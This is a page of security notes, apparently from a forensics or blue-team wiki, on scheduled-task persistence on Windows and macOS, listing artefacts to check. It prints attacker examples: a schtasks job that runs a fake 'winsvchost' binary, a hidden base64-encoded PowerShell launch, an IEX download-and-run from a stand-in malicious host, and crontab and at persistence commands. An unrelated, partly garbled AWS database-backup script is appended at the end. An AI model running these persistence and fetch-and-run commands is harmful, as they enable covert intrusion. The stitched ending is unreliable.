RSS Feed

Tasks Abuse

Created: 03.06.2023


❗️ Both at and schtasks.exe can create tasks remotely.

🏺 Artefacts:

  1. 🪵 Event Log: Task Scheduler Operational.
  2. 🛠️ autoruns
  3. 📂 C: \Windows\ Tasks\ \*.job
  4. 📂 C: \Windows\SchedLgU.txt (Win XP)
  5. 📂 C: \Windows\System32\Tasks


at.exe (deprecated but can still be used) and schtasks.exe. For at see at*.job and Schdlgu.txt

WinXP: at jobs run with SYSTEM privileges.

Files are created here: \Windows\Tasks and \Windows\System32\Tasks (xml duplicate Win7+). Created with: at.exe 22:22:22 C:\mal.exe or

C: \Windows\ Tasks\ \*.job
C: \Windows\SchedLgU.txt # Win XP


schtasks.exe /create /sc daily /tn winsvchost /tr C:\mal.exe /st 09:10:00



An attempt to be stealthy.

powershell -W Hidden -nop -noni -ec <base64somthing> # The output of this command won't show a PowerShell window and the output as well. The script to execute is base64 encoded.
# W WindowStyle = Hidden
# nop NoProfile Does not load PS profile
# noni NonINteractive - no interactive prompt to the user presented

# a popular string to download stuff from the Internet
IEX (New-Object System.Net.WebClient).downloadstring('http://somethingmalicious.com/file')





/usr/bin/crontab Post-exploitation RT tool EmPyre has a module to exploit this technique.

cmd = 'crontab -l | { cat; echo "0 * * * * %s"; } | crontab -'subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()

The cat and echo commands append the new command. The %s in the cmd variable will be updated at runtime with the path of the item to persist, and the 0 * * * * component instructs macOS to execute the job every hour. The crontab - will reinstall any existing jobs, along with the new one.


/private/var/at/jobs/ directory and enumerate them via the /usr/bin/atq utility.

❗️ On a default install of macOS, the at scheduler, /usr/libexec/atrun, is disabled. However, malware can enable it with 👑 root privileges with the following command: launchctl load -w /System/Library/LaunchDaemons/com.apple.atrun.plist.

After enabling this scheduler, malware can create an at job by simply piping persistent commands into /usr/bin/at, specifying the time and date of execution.

Not a popular technique.



Though this directory is owned by root, malware with adequate privileges may be able to create (or subvert) a periodic script in order to achieve persistence at regular intervals. “What is the difference between ‘periodic’ and ‘cron’ on OS X?” https://superuser.com/questions/391204/what-is-the-difference-between-periodic-and-cron-on-os-x/

Login and Logout Hooks

Look for either LoginHook or LogoutHook in the following plist:



export FILENAME=$(date +"%s")
export METADATA_TOKEN=$(curl -s -X PUT -H 'X-aws-ec2-metadata-token-ttl-seconds: 120' export AWS_REGION=$(curl -s -H "X-aws-ec2-metadata-token: $METADATA_TOKEN" document | jq -r '.region')
export DB_SECRETS=$(aws secretsmanager get-secret-value --secret-id $(unique_string)/database --region $AWS_REGION | jq -r '.SecretString')
export DB_USERNAME=$(echo $DB_SECRETS | jq -r '.username')
export DB_NAME=$(echo $DB_SECRETS | jq -r '.name')
export DB_HOST=$(echo $DB_SECRETS | jq -r '.endpoint' | cut -d: -f1)
export DB_PASSWORD=$(echo $DB_SECRETS | jq -r '.password')
MYSQL_PWD=$DB_PASSWORD mysqldump --databases $DB_NAME --tables users -u $DB_USERNAME -h $DB_HOST > /tmp/$FILENAME.sql
aws kms encrypt --key-id alias/backup-$(unique_string) --plaintext fileb:///tmp/$FILENAME.sql --region $AWS_REGION | jq -r '.CiphertextBlob' > /tmp/$FILENAME.sql.enc
aws s3 cp /tmp/$FILENAME.sql.enc s3://sec510-backup-$(unique_string)
rm /tmp/$FILENAME.sql*


Expand… Something here